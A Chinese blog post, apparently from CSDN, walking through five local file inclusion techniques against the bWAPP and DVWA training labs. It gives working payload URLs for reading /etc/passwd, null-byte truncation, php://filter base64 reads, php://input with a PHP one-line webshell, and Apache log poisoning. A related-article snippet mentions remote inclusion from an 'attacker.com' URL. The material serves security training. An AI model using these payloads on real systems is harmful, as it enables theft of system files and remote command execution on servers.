5种文件包含漏洞利用方法

最新推荐文章于 2024-08-12 10:13:56 发布
最新推荐文章于 2024-08-12 10:13:56 发布
阅读量763 收藏 2
点赞数 1
文章标签: java python php linux web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/M110K/article/details/112486738
版权

准备环境

本次使用bWAPP和DVWA作为测试系统,填写 bee/bug 登录系统

no.1.png

选择"本地文件包含" and then hack it
no.2.png
no.3.png

0x1基本的文件包含

http://192.168.66.133/bWAPP/rlfi.php?language=lang_en.php&action=go
http://192.168.66.133/bWAPP/rlfi.php?language=/etc/passwd&action=go

no.4.png

0x2空字节截断

提升系统安全等级,再进行测试,上述方法就会失效

n5.png

采用%00进行截断包含 
http://192.168.66.133/bWAPP/rlfi.php?language=/etc/passwd%00&action=go

n6.png

0x3Base64编码

利用php://filter和base64对获取的内容进行编码显示

http://192.168.66.133/bWAPP/rlfi.php?language=**php://filter/read=convert.base64-encode/resource=**/etc/passwd%00

n7.png

对获取到的数据再进行base64解码即可
n8.png

0x4PHP输入流

利用php://input读取没有处理过的POST数据,POST内容为一句话木马

http://192.168.66.133/bWAPP/rlfi.php?language=**php://input&cmd=id**

POST:<?php system($_GET['cmd']); ?>

n9.png

0x5日志包含

apache会通过日志文件记录用户的连接信息,这些信息包括ip地址、访问时间、请求类型、状态码等信息。这样我们通过访问指定的url将一句话写入到日志文件中,然后通过文件包含漏洞包含Apache日志文件。注意:要使用burp提交数据,绕过前端浏览器url编码

http://192.168.66.133/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id

n10.png
KEY0NE
关注
本地文件包含漏洞详解
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两,一为本地文件包含,一为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含php 中,涉及到的危险函数有四个,分别是 inclu...
文件包含漏洞利用与防御
m0_57379855的博客
03-11 1066
文件包含漏洞利用与防御文件包含漏洞本地文件包含实践远程文件包含PHP相关函数伪协议DVWA靶场练习CTFHub文件包含文件包含漏洞挖掘与利用文件包含漏洞修复方案 文件包含漏洞 文件包含是指程序代码在处理包含文件的时候没有严格控制。 导致用户可以构造参数 包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权 限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果。 主要包括本地文件包含和远程文件包含形式 由于开发人员编写源码,开放若将可重复使用的 代码插入到单个的文件中,井在需
文件包含漏洞03】文件包含漏洞的空字符绕过及六利用方式
Fighting_hawk的博客
03-11 5616
1. 关于图片马的几种执行方式总结: (1)利用中间件解析漏洞,不同中间件不同版本的利用方式往往不同。 (2)利用.htaccess修改Apache局部配置。 (3) 利用文件包含执行漏洞。 2. 了解PHP魔术引号的作用。 3. 掌握文件包含漏洞空字符绕过的方法。 4. 掌握文件包含漏洞的六利用方式。...
文件包含漏洞全面详解
最新发布
2401_84618514的博客
08-12 958
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四
文件包含漏洞-利用方式
Echo__h的博客
04-26 509
session文件通常保存在temp目录下,文件名格式通常为sess_xxxxx(session id),找到一个可以写入session的点即可利用文件包含漏洞。无法上传php文件时,如果存在文件包含,可以上传符合服务器要求的文件,在文件中写入恶意代码,然后再包含以执行。因此可以将一句话木马写入日志文件,再包含日志文件执行木马。网站存在漏洞但没有合适的上传点时,可以尝试包含日志文件(mysql/ssh/apache等)2)通过burp抓包可以发现,‘
文件包含漏洞及利用
weixin_65633498的博客
07-24 616
a.txt中存在可执行的PHP代码,被b.php包含, a.txt中的代码会被直接解析---被包含的文件无论是什么后 缀名,其中的代码均会被执行。a.php中存在可执行的PHP代码,被b.php包含, a.php中的代码会被直接解析。a.php中存在普通的字符串,被b.php包含, a.php中的字符串会直接完成输出。静态文件包含------文件名是固定的------动态文件包含----被包含的文件名是动态传参的。1、文件包含的作用:减小代码的荣誉。调整安全等级为low。三、文件包含漏洞利用
渗透测试之文件包含漏洞&利用姿势
qq_46217803的博客
07-14 1383
文件包含漏洞的分类 大体可以分为:本地文件包含和远程文件包含。顾名思义,引用本地文件,利用inchude包含函数包含本地(服务器)文件。什么是动态变量? 利用协议读取源代码 截断%00 这里假设漏洞代码为 长度截断 漏洞代码演示 与上面原理差不多,在1.txt中写下实例: php:// 实例 如果具有一定的写入权限,POST 写入一句话木马 ...
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
文件包含漏洞
weixin_48450741的博客
09-20 1661
文件包含漏洞 什么是文件包含 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这调用文件的过程一般被称为文件包含文件包含漏洞的成因 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。 文件包含漏洞产生的条件 (1)文件包含漏洞利用的前提条件: 1,web 应用采用 incl
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
文件包含漏洞可以分为本地文件包含漏洞和远程文件包含漏洞两文件包含漏洞的攻击步骤: 1. 准备有文件上传漏洞的网站 2. 客户端浏览器利用本地包含文件漏洞进行攻击 a) 使用正常合法的小图片,使用工具插入...
关于Apache Tomcat存在文件包含漏洞的整改方法
01-09
2020年1月6日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的Apache Tomcat文件包含漏洞(CNVD-2020-10487,对应CVE-2020-1938)。攻击者利用该漏洞,可在未授权的情况下远程读取特定...
什么是文件包含漏洞?文件包含漏洞利用方法及防御技巧
2201_75362610的博客
03-22 1954
例如,攻击者可以将 _GET[‘url’]的值,那么他们就可以在目标系统上从任意URL获取内容。例如,攻击者可以将 G​ET[′url′]的值,那么他们就可以在目标系统上从任意URL获取内容。例如,攻击者可以将_GET[‘url’]的值设置为“http://attacker.com/恶意代码.php”,这样就可以在目标系统上执行恶意代码。例如,攻击者可以将 G​ET[′file′]的值,那么他们就可以在目标系统上包含任意文件。如果攻击者能够控制包含的文件的内容,那么他们就可以在目标系统上执行任意代码。
文件包含漏洞利用
Jim的博客
09-21 756
文件包含漏洞之——防御措施
wsnbbz的博客
03-04 3862
设置白名单 代码在进行文件包含时,如果文件名可以确定,可以设置白名单对传入的参数进行比较。 过滤危险字符 由于Include/Require可以对PHP Wrapper形式的地址进行包含执行(需要配置php.ini),在Linux环境中可以通过”…/…/”的形式进行目录绕过,所以需要判断文件名称是否为合法的PHP文件。 设置文件目录(配置php.ini) PHP配置文件中有open_basedir...
文件包含常见用法与实际使用效果
weixin_71604403的博客
04-18 267
f=file:// 文件路径,这时候可以在文件路径前面加上../,将原来的文件路径改为敏感路径,然后一直加../直到可以访问为止,如果加了很多../还是不能访问可以试着将../进行编码加密。条件:allow_url_fopen: off/on allow_url_include: off/on php 版本大于等于php5.3.0。条件:allow_url_fopen: off/on allow_url_include: off/on。php://filter(本地磁盘文件进行读取)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值